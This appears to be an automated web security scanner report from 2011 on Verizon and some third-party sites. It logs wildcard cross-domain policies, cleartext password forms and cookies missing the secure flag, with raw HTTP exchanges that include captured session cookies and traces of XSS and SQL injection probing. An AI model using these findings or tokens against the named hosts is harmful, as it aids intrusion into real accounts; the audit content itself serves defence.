Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

3.12. http://cache.vzw.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cache.vzw.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.vzw.com

Response

HTTP/1.0 200 OK
Server: None
Content-Type: text/xml
Last-Modified: Fri, 10 Sep 2010 21:19:18 GMT
Content-Length: 786
ETag: "312-4c8aa0d6"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:14:30 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.vzwcorp.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.vzw.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.verizon.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.verizonwireless.com" secure="false" to-ports="*" />
...[SNIP]...

3.13. http://www.verizonwireless.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verizonwireless.com

Response

HTTP/1.1 200 OK
Server: None
Date: Mon, 05 Sep 2011 22:14:30 GMT
Content-type: text/xml
Last-modified: Tue, 14 Apr 2009 18:18:48 GMT
Content-length: 786
Etag: "312-49e4d388"
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.vzwcorp.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.vzw.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.verizon.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.verizonwireless.com" secure="false" to-ports="*" />
...[SNIP]...

3.14. http://www22.verizon.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www22.verizon.com

Response

HTTP/1.0 200 OK
Content-Length: 324
Content-Type: text/xml
Content-Location: http://www22.verizon.com/crossdomain.xml
Last-Modified: Fri, 17 Apr 2009 15:53:50 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 05 Sep 2011 22:13:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:13:38 GMT
Connection: close
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffffa54c16cd45525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.tmpwebeng.com" secure="false"/>
<allow-access-from domain="*.verizon.com" secure="false"/>
...[SNIP]...

4. Silverlight cross-domain policy previous next
There are 2 instances of this issue:

http://pixel.quantserve.com/clientaccesspolicy.xml
http://www22.verizon.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://pixel.quantserve.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 06 Sep 2011 22:14:38 GMT
Content-Type: text/xml
Content-Length: 312
Date: Mon, 05 Sep 2011 22:14:38 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>
<resour
...[SNIP]...

4.2. http://www22.verizon.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www22.verizon.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Jul 2011 08:25:59 GMT
Accept-Ranges: bytes
ETag: "80459cd17f47cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
identifier: 161
Content-Length: 342
Expires: Mon, 05 Sep 2011 22:13:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:13:38 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

5. Cleartext submission of password previous next
There are 3 instances of this issue:

http://cache.vzw.com/globalnav/globalnav.js
http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver
http://www.connecttoverizon.com/loginFailed.html

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

5.1. http://cache.vzw.com/globalnav/globalnav.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.vzw.com
Path:	/globalnav/globalnav.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09

The form contains the following password field:

IDToken2

Request

GET /globalnav/globalnav.js?v=11-09 HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html

Response

HTTP/1.1 200 OK
Server: None
Content-Type: application/x-javascript
Last-Modified: Thu, 01 Sep 2011 01:18:08 GMT
ETag: "1331a-4e5edd50"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 78618
Date: Mon, 05 Sep 2011 22:14:30 GMT
Connection: close

/*******************************************************************************
Version 11.8.5 GlobalNav.js - js functions for creating the globalnav
*********************************************
...[SNIP]...
</div>';
           };

           div.innerHTML +=
               '<form id="signInForm" method="post" action="'+ this.loggedInURL +'" autocomplete="off">'+

               '<input type="hidden" name="goto" id="gotoID" value="'+ this.goTo +'"/>
...[SNIP]...
</label>'+
               '<input type="password" onfocus="inputSignIn(this,event)" onblur="inputSignIn(this,event)" autocomplete="off" maxlength="20" name="IDToken2" id="IDToken2_GN" value="" /><div class="clear15">
...[SNIP]...

5.2. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://webmail.verizonemail.net
Path:	/webmail/servlet/HttpNimletDriver

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

The form contains the following password field:

Request

GET /webmail/servlet/HttpNimletDriver?nimlet=LoginNimlet&site=B HTTP/1.1
Host: webmail.verizonemail.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizonemail.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.3. http://www.connecttoverizon.com/loginFailed.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.connecttoverizon.com
Path:	/loginFailed.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login

The form contains the following password field:

upwd

Request

GET /loginFailed.html?uname=xss&Go.x=26&Go.y=3&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Go=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268 HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=pcwhitefencecom%3D%2526pid%253DConnectToVerizon-Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.connecttoverizon.com/objects/images/spacer.gif%2526ot%253DIMAGE

Response

6. SSL cookie without secure flag set previous next
There are 59 instances of this issue:

https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp
https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp
https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx
https://adwords.google.com/um/StartNewLogin
https://auth.verizon.com/amserver/UI/Login
https://auth.verizon.net/amserver/UI/Login
https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif
https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do
https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js
https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif
https://enterprisecenter.verizon.com/favicon.ico
https://mblogin.verizonwireless.com/amserver/UI/Login
https://signin.verizon.com/sso/VOLPortalLogin
https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX
https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx
https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx
https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx
https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx
https://www22.verizon.com/images/body/gradientsectionhdr.gif
https://www22.verizon.com/images/headerfooter/bubbletranswhite.png
https://www22.verizon.com/images/headerfooter/scbsmbbodytile.gif
https://www22.verizon.com/images/headerfooter/scbsmbdivider.gif
https://www22.verizon.com/images/headerfooter/scbsmbdividerhoriz.gif
https://www22.verizon.com/images/headerfooter/scbsmbdividervert.gif
https://www22.verizon.com/images/headerfooter/scbsmbhoriztile.gif
https://www22.verizon.com/includes/cache/15/blank.html
https://www22.verizon.com/includes/cache/getwb31.asp
https://www22.verizon.com/includes/javascript/commonjs/
https://www22.verizon.com/includes/javascript/hbx.js/
https://www22.verizon.com/includes/javascript/hbx_custom.js/
https://www22.verizon.com/includes/javascript/sitewise.js/
https://www22.verizon.com/vztracker/vzTracker.aspx

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

6.1. https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://login.verizonwireless.com
Path:	/amserver/saml2/jsp/idpSSOInit.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=89A59939130D388D7849198CE10F65BE; Path=/amserver

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amserver/saml2/jsp/idpSSOInit.jsp HTTP/1.1
Host: login.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.2. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://secure.opinionlab.com
Path:	/ccc01/comment_card_json_4_0_b.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDAAAQCDSR=CBJOPHDCDACKEPKDCCMHHGPC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8154
Content-Type: text/html; Charset=UTF-8
Cool01: Opinionlab - Cool01
Set-Cookie: ASPSESSIONIDAAAQCDSR=CBJOPHDCDACKEPKDCCMHHGPC; path=/
Date: Mon, 05 Sep 2011 22:35:41 GMT
Connection: close

<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<titl
...[SNIP]...

6.3. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/content/verizonglobalhome/gpromo.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; expires=Sun, 04-Dec-2011 23:37:54 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/verizonglobalhome/gpromo.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 16461
Expires: Mon, 05 Sep 2011 22:37:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:54 GMT
Connection: close
Set-Cookie: GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; expires=Sun, 04-Dec-2011 23:37:54 GMT; path=/
Set-Cookie: HBXInitialVisit=Y; domain=.verizon.com; path=/


<div class="marquee_selector_bubble sprite sprite_marquee_bubble"></div>
                        <table class="marquee_selectors"><tr><td>

                        <UL><LI><A class="marquee_selector
...[SNIP]...

6.4. https://adwords.google.com/um/StartNewLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 10
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:34:40 GMT
Expires: Mon, 05 Sep 2011 22:34:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

6.5. https://auth.verizon.com/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://auth.verizon.com
Path:	/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

AMAuthCookie=AQIC5wM2LY4SfczpWev%2Bj7wJV5p6Vi3At4%2BjPQ6Fv%2By5Kkk%3D%40AAJTSQACNjkAAlMxAAIwNg%3D%3D%23;Domain=.verizon.com;Path=/
AMAuthCookie=LOGOUT;Domain=.verizon.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:40 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI "
Cache-control: private
Pragma: no-cache
Connection: close
X-dsameversion: 7 2005Q4 patch5 (Tue Feb 27 17:18:03 2007) SunOS
Am_client_type: genericHTML
Location: https://www22.verizon.com/myverizon/?session=n&goto=null
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfczpWev%2Bj7wJV5p6Vi3At4%2BjPQ6Fv%2By5Kkk%3D%40AAJTSQACNjkAAlMxAAIwNg%3D%3D%23;Domain=.verizon.com;Path=/
Set-cookie: amlbcookie=06;Domain=.verizon.com;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

6.6. https://auth.verizon.net/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://auth.verizon.net
Path:	/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

AMAuthCookie=AQIC5wM2LY4SfczLMfAqxGV1489wz3vJJDjxw2SWemh5VQo%3D%40AAJTSQACMzAAAlMxAAIwNA%3D%3D%23;Domain=.verizon.net;Path=/
AMAuthCookie=LOGOUT;Domain=.verizon.net;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:40 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
Connection: close
X-dsameversion: 7 2005Q4 patch 120954-05
Am_client_type: genericHTML
Location: https://www.verizon.net/ssowebapp/VOLPortalLoginnull
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfczLMfAqxGV1489wz3vJJDjxw2SWemh5VQo%3D%40AAJTSQACMzAAAlMxAAIwNA%3D%3D%23;Domain=.verizon.net;Path=/
Set-cookie: amlbcookie=04;Domain=.verizon.net;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.net;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

6.7. https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1474
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:11 GMT
ETag: "5c2-4e228ad3"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89aQ...............mm............!..NETSCAPE2.0.....!.. ....,....Q....fh...0.I..8...-`(.Di.........:b].......;..a..aB...[..%Z..m2....8.is..w.F......e...h...f.d8^........... .!.......,....Q....mx
...[SNIP]...

6.8. https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/global/gHome.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/global/gHome.do HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
